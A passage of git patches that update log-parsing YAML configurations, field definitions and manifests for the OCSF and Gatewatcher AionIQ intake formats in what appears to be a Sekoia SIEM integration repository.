           action.properties.ProductName: "{{json_event.message.event_data.get('Product Name')}}"
@@ -378,6 +382,8 @@ stages:
           action.properties.ScriptBlockText: "{{json_event.message.event_data.get('ScriptBlockText')}}"
           action.properties.SecureRequired: "{{json_event.message.event_data.get('SecureRequired')}}"
           action.properties.SecurityintelligenceVersion: "{{json_event.message.event_data.get('Security intelligence Version')}}"
+          action.properties.ServiceName: "{{json_event.message.event_data.get('ServiceName')}}"
+          action.properties.ServiceSid: "{{json_event.message.event_data.get('ServiceSid')}}"
           action.properties.SeverityID: "{{json_event.message.event_data.get('Severity ID')}}"
           action.properties.SeverityName: "{{json_event.message.event_data.get('Severity Name')}}"
           action.properties.ShareLocalPath: "{{json_event.message.event_data.get('ShareLocalPath')}}"
@@ -410,23 +416,24 @@ stages:
           action.properties.TaskName: "{{json_event.message.event_data.get('TaskName')}}"
           action.properties.ThreatID: "{{json_event.message.event_data.get('Threat ID')}}"
           action.properties.ThreatName: "{{json_event.message.event_data.get('Threat Name')}}"
+          action.properties.TicketEncryptionType: "{{json_event.message.event_data.get('TicketEncryptionType')}}"
+          action.properties.TicketOptions: "{{json_event.message.event_data.get('TicketOptions')}}"
           action.properties.TotalSignatureCount: "{{json_event.message.event_data.get('TotalSignatureCount')}}"
           action.properties.TransmittedServices: "{{json_event.message.event_data.get('TransmittedServices')}}"
           action.properties.TypeID: "{{json_event.message.event_data.get('Type ID')}}"
           action.properties.TypeName: "{{json_event.message.event_data.get('Type Name')}}"
-          action.properties.Unused: "{{json_event.message.event_data.get('Unused')}}"
           action.properties.Unused2: "{{json_event.message.event_data.get('Unused2')}}"
           action.properties.Unused3: "{{json_event.message.event_data.get('Unused3')}}"
           action.properties.Unused4: "{{json_event.message.event_data.get('Unused4')}}"
           action.properties.Unused5: "{{json_event.message.event_data.get('Unused5')}}"
           action.properties.Unused6: "{{json_event.message.event_data.get('Unused6')}}"
+          action.properties.Unused: "{{json_event.message.event_data.get('Unused')}}"
           action.properties.ValidatedPolicy: "{{json_event.message.event_data.get('ValidatedPolicy')}}"
           action.properties.ValidatedSigningLevel: "{{json_event.message.event_data.get('ValidatedSigningLevel')}}"
           action.properties.VerificationError: "{{json_event.message.event_data.get('VerificationError')}}"
           action.properties.VirtualAccount: "{{json_event.message.event_data.get('VirtualAccount')}}"
           action.properties.WorkstationName: "{{json_event.message.event_data.get('WorkstationName')}}"
           action.properties.param0: "{{json_event.message.event_data.get('param0')}}"
-          action.properties.param1: "{{json_event.message.event_data.get('param1')}}"
           action.properties.param10: "{{json_event.message.event_data.get('param10')}}"
           action.properties.param11: "{{json_event.message.event_data.get('param11')}}"
           action.properties.param12: "{{json_event.message.event_data.get('param12')}}"
@@ -437,10 +444,11 @@ stages:
           action.properties.param17: "{{json_event.message.event_data.get('param17')}}"
           action.properties.param18: "{{json_event.message.event_data.get('param18')}}"
           action.properties.param19: "{{json_event.message.event_data.get('param19')}}"
-          action.properties.param2: "{{json_event.message.event_data.get('param2')}}"
+          action.properties.param1: "{{json_event.message.event_data.get('param1')}}"
           action.properties.param20: "{{json_event.message.event_data.get('param20')}}"
           action.properties.param21: "{{json_event.message.event_data.get('param21')}}"
           action.properties.param22: "{{json_event.message.event_data.get('param22')}}"
+          action.properties.param2: "{{json_event.message.event_data.get('param2')}}"
           action.properties.param3: "{{json_event.message.event_data.get('param3')}}"
           action.properties.param4: "{{json_event.message.event_data.get('param4')}}"
           action.properties.param5: "{{json_event.message.event_data.get('param5')}}"

From 56643bd300f8846842694f0f59f3af8ad1e8237d Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Fri, 20 Sep 2024 10:48:09 +0200
Subject: [PATCH 063/317] fix(OCSF): add automation connector information

---
 OCSF/ocsf/_meta/manifest.yml | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/OCSF/ocsf/_meta/manifest.yml b/OCSF/ocsf/_meta/manifest.yml
index 931c78599..b962f6e78 100644
--- a/OCSF/ocsf/_meta/manifest.yml
+++ b/OCSF/ocsf/_meta/manifest.yml
@@ -1,4 +1,6 @@
 uuid: a9c959ac-78ec-47a4-924e-8156a77cebf5
+automation_connector_uuid: 04c40271-b44e-4977-8c62-5356011b2bb6
+automation_module_uuid: b4462429-6f0f-42b5-87b8-430111697d28
 name: OCSF
 slug: ocsf
 

From d4cd82be3487d9eeec38c70ca86d72bce2422a16 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Tue, 17 Sep 2024 11:07:49 +0200
Subject: [PATCH 064/317] fix(GateWatcher): fix the identifier of the format

---
 GateWatcher/aioniq/_meta/manifest.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/GateWatcher/aioniq/_meta/manifest.yml b/GateWatcher/aioniq/_meta/manifest.yml
index a540d5536..ca91ad93d 100644
--- a/GateWatcher/aioniq/_meta/manifest.yml
+++ b/GateWatcher/aioniq/_meta/manifest.yml
@@ -1,4 +1,4 @@
-uuid: 0825709a-5f76-441e-9dfb-2b5ea6ce551c
+uuid: bba2bed2-d925-440f-a0ce-dbcae04eaf26
 name: Gatewatcher AionIQ
 slug: aioniq
 

From 33d3ae72e888526ee9876b6da1a47efaef7c2db4 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Tue, 17 Sep 2024 11:08:16 +0200
Subject: [PATCH 065/317] chore(GateWatcher): add the version for the format

---
 GateWatcher/aioniq/_meta/manifest.yml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/GateWatcher/aioniq/_meta/manifest.yml b/GateWatcher/aioniq/_meta/manifest.yml
index ca91ad93d..010f47f7e 100644
--- a/GateWatcher/aioniq/_meta/manifest.yml
+++ b/GateWatcher/aioniq/_meta/manifest.yml
@@ -1,9 +1,10 @@
 uuid: bba2bed2-d925-440f-a0ce-dbcae04eaf26
-name: Gatewatcher AionIQ
+name: Gatewatcher AionIQ v102
 slug: aioniq
 
 description: >-
   A new detection and response platform (NDR) that enables to identify with certainty malicious actions and suspicious behaviors based on a mapping of all assets present on the information system.
+  This format parses events up to the version 102.
 
 data_sources:
   Network intrusion detection system: AIONIQ identify suspicious behaviors

From 4799d26c0a8075963ac59c25bfe14842a97e2b79 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Tue, 17 Sep 2024 11:08:40 +0200
Subject: [PATCH 066/317] chore(GateWatcher): clean up the parser

---
 GateWatcher/aioniq/ingest/parser.yml | 41 ----------------------------
 1 file changed, 41 deletions(-)

diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml
index 162cc5093..49a30a7da 100644
--- a/GateWatcher/aioniq/ingest/parser.yml
+++ b/GateWatcher/aioniq/ingest/parser.yml
@@ -1,17 +1,12 @@
 name: gatewatcher-aioniq-legacy-format
-ignored_values: null
 pipeline:
   - name: json_load
-    description: ''
-    filter: ''
     external:
       name: json.parse-json
       properties:
         input_field: '{{original.message}}'
         output_field: message
   - name: parsed_date
-    description: ''
-    filter: ''
     external:
       name: date.parse
       properties:
@@ -20,48 +15,29 @@ pipeline:
         format: null
         timezone: UTC
   - name: common
-    description: ''
-    filter: ''
-    external: null
   - name: malcore
-    description: ''
     filter: '{{json_load.message.type == "malcore"}}'
-    external: null
   - name: suricata
-    description: ''
     filter: '{{json_load.message.type == "suricata"}}'
-    external: null
   - name: powershell
     description: powershell
-    filter: ''
-    external: null
   - name: shellcode
     description: shellcode
-    filter: ''
-    external: null
   - name: fileinfo
     description: fileinfo
-    filter: ''
-    external: null
   - name: dga
     description: DGA
-    filter: ''
-    external: null
   - name: retrohunt
     description: Retrohunt
-    filter: ''
-    external: null
 stages:
   common:
     actions:
       - set:
           source.ip: '{{json_load.message.src_ip}}'
         filter: '{{json_load.message.src_ip | is_ipaddress}}'
-        name: set
       - set:
           destination.ip: '{{json_load.message.dest_ip}}'
         filter: '{{json_load.message.dest_ip | is_ipaddress}}'
-        name: set
       - set:
           '@timestamp': '{{parsed_date.datetime}}'
           source.port: '{{json_load.message.src_port}}'
@@ -86,14 +62,11 @@ stages:
           gatewatcher.payload_printable: '{{json_load.message.payload_printable}}'
           gatewatcher.timestamp_analyzed: '{{json_load.message.timestamp_analyzed}}'
           gatewatcher.timestamp_detected: '{{json_load.message.timestamp_detected}}'
-        filter: ''
-        name: set
       - set:
           observer.mac: >-
             ["{{json_load.message.ether.src_mac}}",
             "{{json_load.message.ether.dest_mac}}"]
         filter: '{{json_load.message.ether != null}}'
-        name: set
   malcore:
     actions:
       - set:
@@ -120,8 +93,6 @@ stages:
           gatewatcher.malcore.replica: '{{json_load.message.replica}}'
           gatewatcher.reporting_token: '{{json_load.message.reporting_token}}'
           gatewatcher.malcore.detail_threat_found: '{{json_load.message.detail_threat_found}}'
-        filter: ''
-        name: set
   suricata:
     actions:
       - set:
@@ -170,8 +141,6 @@ stages:
           gatewatcher.ftp_data: '{{json_load.message.ftp_data}}'
           gatewatcher.email: '{{json_load.message.email}}'
           http.response.status_code: '{{json_load.message.http.status}}'
-        filter: ''
-        name: set
   powershell:
     actions:
       - set:
@@ -180,8 +149,6 @@ stages:
           gatewatcher.scores.analysis: '{{json_load.message.scores.analysis}}'
           gatewatcher.scores.proba_obfuscated: '{{json_load.message.scores.proba_obfuscated}}'
           gatewatcher.scores.analysis_detailed: '{{json_load.message.scores.analysis_detailed}}'
-        filter: ''
-        name: set
   shellcode:
     actions:
       - set:
@@ -190,14 +157,10 @@ stages:
           gatewatcher.encodings: '{{json_load.message.encodings}}'
           gatewatcher.sample_id: '{{json_load.message.sample_id}}'
           gatewatcher.sub_type: '{{json_load.message.sub_type}}'
-        filter: ''
-        name: set
   fileinfo:
     actions:
       - set:
           gatewatcher.filemagic: '{{json_load.message.fileinfo.magic}}'
-        filter: ''
-        name: set
   dga:
     actions:
       - set:
@@ -205,8 +168,6 @@ stages:
           gatewatcher.domain_name: '{{json_load.message.domain_name}}'
           gatewatcher.probability: '{{json_load.message.probability}}'
           gatewatcher.matched_event: '{{json_load.message.matched_event}}'
-        filter: ''
-        name: set
   retrohunt:
     actions:
       - set:
@@ -240,5 +201,3 @@ stages:
           gatewatcher.targeted_countries: '{{json_load.message.targeted_countries}}'
           gatewatcher.targeted_platforms: '{{json_load.message.targeted_platforms}}'
           gatewatcher.targeted_organizations: '{{json_load.message.targeted_organizations}}'
-        filter: ''
-        name: set

From fb4e7a9bff031ff428124719122670fad2742149 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Tue, 17 Sep 2024 11:14:25 +0200
Subject: [PATCH 067/317] fix(GateWatcher): apply linter

---
 GateWatcher/aioniq/_meta/fields.yml         | 187 +++++++-------
 GateWatcher/aioniq/ingest/parser.yml        | 270 ++++++++++----------
 GateWatcher/aioniq/tests/codebreaker.json   |   4 +-
 GateWatcher/aioniq/tests/dga.json           |   4 +-
 GateWatcher/aioniq/tests/malcore.json       |   4 +-
 GateWatcher/aioniq/tests/retrohunt.json     |   4 +-
 GateWatcher/aioniq/tests/sigflow-alert.json |   4 +-
 GateWatcher/aioniq/tests/sigflow-file.json  |   4 +-
 GateWatcher/aioniq/tests/sigflow-meta.json  |   4 +-
 9 files changed, 237 insertions(+), 248 deletions(-)

diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml
index 5bdc4fb3e..01ffdaf05 100644
--- a/GateWatcher/aioniq/_meta/fields.yml
+++ b/GateWatcher/aioniq/_meta/fields.yml
@@ -1,83 +1,3 @@
-gatewatcher.event_type:
-  description: Type of event
-  name: gatewatcher.event_type
-  type: keyword
-
-gatewatcher.flow_id:
-  description: Identifier of the flow
-  name: gatewatcher.flow_id
-  type: keyword
-
-gatewatcher.gcap:
-  description: Name of the gcap
-  name: gatewatcher.gcap
-  type: keyword
-
-gatewatcher.gcenter:
-  description: Name of the associated gcenter
-  name: gatewatcher.gcenter
-  type: keyword
-
-gatewatcher.malcore.code:
-  description: Return code of the malcore analysis
-  name: gatewatcher.malcore.code
-  type: number
-
-gatewatcher.malcore.detail_threat_found:
-  description: Type of the detected threat
-  name: gatewatcher.malcore.detail_threat_found
-  type: keyword
-
-gatewatcher.malcore.file:
-  description: Identifier of the file
-  name: gatewatcher.malcore.file
-  type: keyword
-
-gatewatcher.malcore.magic:
-  description: The magic number of the executable of the malware
-  name: gatewatcher.malcore.magic
-  type: keyword
-
-gatewatcher.malcore.replica:
-  description: Analysis is a replica of another previous one
-  name: gatewatcher.malcore.replica
-  type: keyword
-
-gatewatcher.nb_rescans:
-  description: Number of retroact analysis
-  name: gatewatcher.nb_rescans
-  type: long
-
-gatewatcher.reporting_token:
-  description: Token used by Gbox
-  name: gatewatcher.reporting_token
-  type: keyword
-
-gatewatcher.retroact:
-  description: Analysis result per retroact
-  name: gatewatcher.retroact
-  type: keyword
-
-gatewatcher.state:
-  description: Analysis result
-  name: gatewatcher.state
-  type: keyword
-
-gatewatcher.timestamp_analyzed:
-  description: Timestamp of the alert processing by gcenter
-  name: gatewatcher.timestamp_analyzed
-  type: keyword
-
-gatewatcher.timestamp_detected:
-  description: Timestamp of the file collection by gcap
-  name: gatewatcher.timestamp_detected
-  type: keyword
-
-gatewatcher.type:
-  description: Type of analysis
-  name: gatewatcher.type
-  type: keyword
-
 gatewatcher.calls:
   description: This field represents the list of calls detected in a shellcode
   name: gatewatcher.calls
@@ -120,11 +40,21 @@ gatewatcher.domain_name:
   name: gatewatcher.domain_name
   type: text
 
+gatewatcher.email:
+  description: This field represents the email field
+  name: gatewatcher.email
+  type: text
+
 gatewatcher.encodings:
   description: This field represents the encodings used in the shellcode
   name: gatewatcher.encodings
   type: text
 
+gatewatcher.event_type:
+  description: Type of event
+  name: gatewatcher.event_type
+  type: keyword
+
 gatewatcher.external_links:
   description: This field is used for retrohunt alerts
   name: gatewatcher.external_links
@@ -146,6 +76,11 @@ gatewatcher.filemagic:
   name: gatewatcher.filemagic
   type: text
 
+gatewatcher.flow_id:
+  description: Identifier of the flow
+  name: gatewatcher.flow_id
+  type: keyword
+
 gatewatcher.ftp:
   description: This field represents the ftp field in a network metadata (used in
     legacy format log)
@@ -158,6 +93,16 @@ gatewatcher.ftp_data:
   name: gatewatcher.ftp_data
   type: text
 
+gatewatcher.gcap:
+  description: Name of the gcap
+  name: gatewatcher.gcap
+  type: keyword
+
+gatewatcher.gcenter:
+  description: Name of the associated gcenter
+  name: gatewatcher.gcenter
+  type: keyword
+
 gatewatcher.http2:
   description: This field represents the http2 field in a network metadata (used in
     legacy format log)
@@ -211,6 +156,31 @@ gatewatcher.krb5:
   name: gatewatcher.krb5
   type: text
 
+gatewatcher.malcore.code:
+  description: Return code of the malcore analysis
+  name: gatewatcher.malcore.code
+  type: number
+
+gatewatcher.malcore.detail_threat_found:
+  description: Type of the detected threat
+  name: gatewatcher.malcore.detail_threat_found
+  type: keyword
+
+gatewatcher.malcore.file:
+  description: Identifier of the file
+  name: gatewatcher.malcore.file
+  type: keyword
+
+gatewatcher.malcore.magic:
+  description: The magic number of the executable of the malware
+  name: gatewatcher.malcore.magic
+  type: keyword
+
+gatewatcher.malcore.replica:
+  description: Analysis is a replica of another previous one
+  name: gatewatcher.malcore.replica
+  type: keyword
+
 gatewatcher.matched_event:
   description: This field represents the matched event found in a dga and retrohunt
     alert
@@ -233,6 +203,11 @@ gatewatcher.mqtt:
   name: gatewatcher.mqtt
   type: text
 
+gatewatcher.nb_rescans:
+  description: Number of retroact analysis
+  name: gatewatcher.nb_rescans
+  type: long
+
 gatewatcher.nfs:
   description: This field represents the nfs field in a network metadata (used in
     legacy format log)
@@ -266,6 +241,16 @@ gatewatcher.relations:
   name: gatewatcher.relations
   type: text
 
+gatewatcher.reporting_token:
+  description: Token used by Gbox
+  name: gatewatcher.reporting_token
+  type: keyword
+
+gatewatcher.retroact:
+  description: Analysis result per retroact
+  name: gatewatcher.retroact
+  type: keyword
+
 gatewatcher.rfb:
   description: This field represents the rfb field in a network metadata (used in
     legacy format log)
@@ -320,11 +305,6 @@ gatewatcher.smb:
   name: gatewatcher.smb
   type: text
 
-gatewatcher.email:
-  description: This field represents the email field
-  name: gatewatcher.email
-  type: text
-
 gatewatcher.smtp:
   description: This field represents the smtp field in a network metadata (used in
     legacy format log)
@@ -343,6 +323,11 @@ gatewatcher.ssh:
   name: gatewatcher.ssh
   type: text
 
+gatewatcher.state:
+  description: Analysis result
+  name: gatewatcher.state
+  type: keyword
+
 gatewatcher.stats:
   description: This field represents the metrics stats
   name: gatewatcher.stats
@@ -373,19 +358,10 @@ gatewatcher.targeted_sectors:
   name: gatewatcher.targeted_sectors
   type: text
 
-gatewatcher.tftp.file:
-  description: tftp file field
-  name: gatewatcher.tftp.file
-  type: text
-
-gatewatcher.tftp.mode:
-  description: tftp mode field
-  name: gatewatcher.tftp.mode
-  type: text
-
-gatewatcher.tftp.packet:
-  description: tftp packet field
-  name: gatewatcher.tftp.packet
+gatewatcher.tftp:
+  description: This field represents the tftp field in a network metadata (used in
+    legacy format log)
+  name: gatewatcher.tftp
   type: text
 
 gatewatcher.threat_actor:
@@ -393,6 +369,16 @@ gatewatcher.threat_actor:
   name: gatewatcher.threat_actor
   type: text
 
+gatewatcher.timestamp_analyzed:
+  description: Timestamp of the alert processing by gcenter
+  name: gatewatcher.timestamp_analyzed
+  type: keyword
+
+gatewatcher.timestamp_detected:
+  description: Timestamp of the file collection by gcap
+  name: gatewatcher.timestamp_detected
+  type: keyword
+
 gatewatcher.timestamp_package:
   description: This field is used for retrohunt alerts
   name: gatewatcher.timestamp_package
@@ -414,6 +400,11 @@ gatewatcher.ttp:
   name: gatewatcher.ttp
   type: text
 
+gatewatcher.type:
+  description: Type of analysis
+  name: gatewatcher.type
+  type: keyword
+
 gatewatcher.usage_mode:
   description: This field is used for retrohunt alerts
   name: gatewatcher.usage_mode
diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml
index 49a30a7da..93f390a79 100644
--- a/GateWatcher/aioniq/ingest/parser.yml
+++ b/GateWatcher/aioniq/ingest/parser.yml
@@ -4,13 +4,13 @@ pipeline:
     external:
       name: json.parse-json
       properties:
-        input_field: '{{original.message}}'
+        input_field: "{{original.message}}"
         output_field: message
   - name: parsed_date
     external:
       name: date.parse
       properties:
-        input_field: '{{json_load.message.timestamp_analyzed}}'
+        input_field: "{{json_load.message.timestamp_analyzed}}"
         output_field: datetime
         format: null
         timezone: UTC
@@ -33,171 +33,169 @@ stages:
   common:
     actions:
       - set:
-          source.ip: '{{json_load.message.src_ip}}'
-        filter: '{{json_load.message.src_ip | is_ipaddress}}'
+          source.ip: "{{json_load.message.src_ip}}"
+        filter: "{{json_load.message.src_ip | is_ipaddress}}"
       - set:
-          destination.ip: '{{json_load.message.dest_ip}}'
-        filter: '{{json_load.message.dest_ip | is_ipaddress}}'
+          destination.ip: "{{json_load.message.dest_ip}}"
+        filter: "{{json_load.message.dest_ip | is_ipaddress}}"
       - set:
-          '@timestamp': '{{parsed_date.datetime}}'
-          source.port: '{{json_load.message.src_port}}'
-          observer.name: '{{json_load.message.gcap}}'
+          "@timestamp": "{{parsed_date.datetime}}"
+          source.port: "{{json_load.message.src_port}}"
+          observer.name: "{{json_load.message.gcap}}"
           observer.type: ids
           event.category:
             - network
-          event.severity: '{{json_load.message.severity}}'
-          destination.port: '{{json_load.message.dest_port}}'
-          gatewatcher.gcap: '{{json_load.message.gcap}}'
-          gatewatcher.type: '{{json_load.message.type}}'
-          network.protocol: '{{json_load.message.app_proto}}'
-          observer.version: '0.2'
-          gatewatcher.state: '{{json_load.message.state}}'
-          gatewatcher.stats: '{{json_load.message.stats}}'
-          network.transport: '{{json_load.message.proto}}'
-          observer.hostname: '{{json_load.message.host}}'
-          gatewatcher.flow_id: '{{json_load.message.flow_id}}'
-          gatewatcher.gcenter: '{{json_load.message.gcenter}}'
-          gatewatcher.payload: '{{json_load.message.payload}}'
-          gatewatcher.event_type: '{{json_load.message.event_type}}'
-          gatewatcher.payload_printable: '{{json_load.message.payload_printable}}'
-          gatewatcher.timestamp_analyzed: '{{json_load.message.timestamp_analyzed}}'
-          gatewatcher.timestamp_detected: '{{json_load.message.timestamp_detected}}'
+          event.severity: "{{json_load.message.severity}}"
+          destination.port: "{{json_load.message.dest_port}}"
+          gatewatcher.gcap: "{{json_load.message.gcap}}"
+          gatewatcher.type: "{{json_load.message.type}}"
+          network.protocol: "{{json_load.message.app_proto}}"
+          observer.version: "0.2"
+          gatewatcher.state: "{{json_load.message.state}}"
+          gatewatcher.stats: "{{json_load.message.stats}}"
+          network.transport: "{{json_load.message.proto}}"
+          observer.hostname: "{{json_load.message.host}}"
+          gatewatcher.flow_id: "{{json_load.message.flow_id}}"
+          gatewatcher.gcenter: "{{json_load.message.gcenter}}"
+          gatewatcher.payload: "{{json_load.message.payload}}"
+          gatewatcher.event_type: "{{json_load.message.event_type}}"
+          gatewatcher.payload_printable: "{{json_load.message.payload_printable}}"
+          gatewatcher.timestamp_analyzed: "{{json_load.message.timestamp_analyzed}}"
+          gatewatcher.timestamp_detected: "{{json_load.message.timestamp_detected}}"
       - set:
           observer.mac: >-
             ["{{json_load.message.ether.src_mac}}",
             "{{json_load.message.ether.dest_mac}}"]
-        filter: '{{json_load.message.ether != null}}'
+        filter: "{{json_load.message.ether != null}}"
   malcore:
     actions:
       - set:
-          url.path: '{{json_load.message.http.url}}'
-          file.name: '{{json_load.message.fileinfo.filename}}'
-          file.size: '{{json_load.message.fileinfo.size}}'
+          url.path: "{{json_load.message.http.url}}"
+          file.name: "{{json_load.message.fileinfo.filename}}"
+          file.size: "{{json_load.message.fileinfo.size}}"
           event.type:
             - info
-          url.domain: '{{json_load.message.http.hostname}}'
-          http.version: '{{json_load.message.http.version}}'
-          file.hash.md5: '{{json_load.message.fileinfo.md5}}'
+          url.domain: "{{json_load.message.http.hostname}}"
+          http.version: "{{json_load.message.http.version}}"
+          file.hash.md5: "{{json_load.message.fileinfo.md5}}"
           event.category:
             - malware
-          file.hash.sha256: '{{json_load.message.fileinfo.sha256}}'
-          http.request.method: '{{json_load.message.http.http_method}}'
-          user_agent.original: '{{json_load.message.http.http_user_agent}}'
-          gatewatcher.fileinfo: '{{json_load.message.fileinfo}}'
-          gatewatcher.retroact: '{{json_load.message.retroact}}'
-          gatewatcher.nb_rescans: '{{json_load.message.nb_rescans}}'
-          gatewatcher.malcore.code: '{{json_load.message.code|string}}'
-          gatewatcher.malcore.file: '{{json_load.message.file}}'
-          gatewatcher.malcore.magic: '{{json_load.message.magic}}'
-          http.response.status_code: '{{json_load.message.http.status}}'
-          gatewatcher.malcore.replica: '{{json_load.message.replica}}'
-          gatewatcher.reporting_token: '{{json_load.message.reporting_token}}'
-          gatewatcher.malcore.detail_threat_found: '{{json_load.message.detail_threat_found}}'
+          file.hash.sha256: "{{json_load.message.fileinfo.sha256}}"
+          http.request.method: "{{json_load.message.http.http_method}}"
+          user_agent.original: "{{json_load.message.http.http_user_agent}}"
+          gatewatcher.fileinfo: "{{json_load.message.fileinfo}}"
+          gatewatcher.retroact: "{{json_load.message.retroact}}"
+          gatewatcher.nb_rescans: "{{json_load.message.nb_rescans}}"
+          gatewatcher.malcore.code: "{{json_load.message.code|string}}"
+          gatewatcher.malcore.file: "{{json_load.message.file}}"
+          gatewatcher.malcore.magic: "{{json_load.message.magic}}"
+          http.response.status_code: "{{json_load.message.http.status}}"
+          gatewatcher.malcore.replica: "{{json_load.message.replica}}"
+          gatewatcher.reporting_token: "{{json_load.message.reporting_token}}"
+          gatewatcher.malcore.detail_threat_found: "{{json_load.message.detail_threat_found}}"
   suricata:
     actions:
       - set:
-          dns.id: '{{json_load.message.dns.id}}'
-          rule.id: '{{json_load.message.alert.signature_id|string}}'
-          dns.type: '{{json_load.message.dns.type}}'
-          url.path: '{{json_load.message.http.url}}'
-          file.name: '{{json_load.message.fileinfo.filename}}'
-          file.size: '{{json_load.message.fileinfo.size}}'
-          rule.name: '{{json_load.message.alert.signature}}'
-          url.domain: '{{json_load.message.http.hostname}}'
-          event.action: '{{json_load.message.alert.action}}'
-          http.version: '{{json_load.message.http.version}}'
-          rule.version: '{{json_load.message.alert.rule.version}}'
-          source.bytes: '{{json_load.message.flow.bytes_toserver}}'
-          file.hash.md5: '{{json_load.message.fileinfo.md5}}'
-          rule.category: '{{json_load.message.alert.category}}'
-          source.packets: '{{json_load.message.flow.pkts_toserver}}'
-          gatewatcher.ftp: '{{json_load.message.ftp}}'
-          gatewatcher.nfs: '{{json_load.message.nfs}}'
-          gatewatcher.rdp: '{{json_load.message.rdp}}'
-          gatewatcher.rfb: '{{json_load.message.rfb}}'
-          gatewatcher.rpc: '{{json_load.message.rpc}}'
-          gatewatcher.sip: '{{json_load.message.sip}}'
-          gatewatcher.smb: '{{json_load.message.smb}}'
-          gatewatcher.ssh: '{{json_load.message.ssh}}'
-          gatewatcher.tls: '{{json_load.message.tls}}'
-          file.hash.sha256: '{{json_load.message.fileinfo.sha256}}'
-          gatewatcher.dhcp: '{{json_load.message.dhcp}}'
-          gatewatcher.dnp3: '{{json_load.message.dnp3}}'
-          gatewatcher.krb5: '{{json_load.message.krb5}}'
-          gatewatcher.mqtt: '{{json_load.message.mqtt}}'
-          gatewatcher.smtp: '{{json_load.message.smtp}}'
-          gatewatcher.snmp: '{{json_load.message.snmp}}'
-          gatewatcher.tftp.file: '{{json_load.message.tftp.file}}'
-          gatewatcher.tftp.mode: '{{json_load.message.tftp.mode}}'
-          gatewatcher.tftp.packet: '{{json_load.message.tftp.packet}}'
-          destination.bytes: '{{json_load.message.flow.bytes_toclient}}'
-          dns.question.name: '{{json_load.message.dns.rrname}}'
-          dns.question.type: '{{json_load.message.dns.rrtype}}'
-          gatewatcher.http2: '{{json_load.message.http.http2}}'
-          gatewatcher.ikev2: '{{json_load.message.ikev2}}'
-          destination.packets: '{{json_load.message.flow.pkts_toclient}}'
-          http.request.method: '{{json_load.message.http.http_method}}'
-          user_agent.original: '{{json_load.message.http.http_user_agent}}'
-          gatewatcher.ftp_data: '{{json_load.message.ftp_data}}'
-          gatewatcher.email: '{{json_load.message.email}}'
-          http.response.status_code: '{{json_load.message.http.status}}'
+          dns.id: "{{json_load.message.dns.id}}"
+          rule.id: "{{json_load.message.alert.signature_id|string}}"
+          dns.type: "{{json_load.message.dns.type}}"
+          url.path: "{{json_load.message.http.url}}"
+          file.name: "{{json_load.message.fileinfo.filename}}"
+          file.size: "{{json_load.message.fileinfo.size}}"
+          rule.name: "{{json_load.message.alert.signature}}"
+          url.domain: "{{json_load.message.http.hostname}}"
+          event.action: "{{json_load.message.alert.action}}"
+          http.version: "{{json_load.message.http.version}}"
+          rule.version: "{{json_load.message.alert.rule.version}}"
+          source.bytes: "{{json_load.message.flow.bytes_toserver}}"
+          file.hash.md5: "{{json_load.message.fileinfo.md5}}"
+          rule.category: "{{json_load.message.alert.category}}"
+          source.packets: "{{json_load.message.flow.pkts_toserver}}"
+          gatewatcher.ftp: "{{json_load.message.ftp}}"
+          gatewatcher.nfs: "{{json_load.message.nfs}}"
+          gatewatcher.rdp: "{{json_load.message.rdp}}"
+          gatewatcher.rfb: "{{json_load.message.rfb}}"
+          gatewatcher.rpc: "{{json_load.message.rpc}}"
+          gatewatcher.sip: "{{json_load.message.sip}}"
+          gatewatcher.smb: "{{json_load.message.smb}}"
+          gatewatcher.ssh: "{{json_load.message.ssh}}"
+          gatewatcher.tls: "{{json_load.message.tls}}"
+          file.hash.sha256: "{{json_load.message.fileinfo.sha256}}"
+          gatewatcher.dhcp: "{{json_load.message.dhcp}}"
+          gatewatcher.dnp3: "{{json_load.message.dnp3}}"
+          gatewatcher.krb5: "{{json_load.message.krb5}}"
+          gatewatcher.mqtt: "{{json_load.message.mqtt}}"
+          gatewatcher.smtp: "{{json_load.message.smtp}}"
+          gatewatcher.snmp: "{{json_load.message.snmp}}"
+          gatewatcher.tftp: "{{json_load.message.tftp}}"
+          destination.bytes: "{{json_load.message.flow.bytes_toclient}}"
+          dns.question.name: "{{json_load.message.dns.rrname}}"
+          dns.question.type: "{{json_load.message.dns.rrtype}}"
+          gatewatcher.http2: "{{json_load.message.http.http2}}"
+          gatewatcher.ikev2: "{{json_load.message.ikev2}}"
+          destination.packets: "{{json_load.message.flow.pkts_toclient}}"
+          http.request.method: "{{json_load.message.http.http_method}}"
+          user_agent.original: "{{json_load.message.http.http_user_agent}}"
+          gatewatcher.ftp_data: "{{json_load.message.ftp_data}}"
+          gatewatcher.email: "{{json_load.message.email}}"
+          http.response.status_code: "{{json_load.message.http.status}}"
   powershell:
     actions:
       - set:
-          event.module: '{{json_load.message.sub_type}}'
-          gatewatcher.sample_id: '{{json_load.message.file_id}}'
-          gatewatcher.scores.analysis: '{{json_load.message.scores.analysis}}'
-          gatewatcher.scores.proba_obfuscated: '{{json_load.message.scores.proba_obfuscated}}'
-          gatewatcher.scores.analysis_detailed: '{{json_load.message.scores.analysis_detailed}}'
+          event.module: "{{json_load.message.sub_type}}"
+          gatewatcher.sample_id: "{{json_load.message.file_id}}"
+          gatewatcher.scores.analysis: "{{json_load.message.scores.analysis}}"
+          gatewatcher.scores.proba_obfuscated: "{{json_load.message.scores.proba_obfuscated}}"
+          gatewatcher.scores.analysis_detailed: "{{json_load.message.scores.analysis_detailed}}"
   shellcode:
     actions:
       - set:
-          event.module: '{{json_load.message.event_type}}'
-          gatewatcher.calls: '{{json_load.message.calls}}'
-          gatewatcher.encodings: '{{json_load.message.encodings}}'
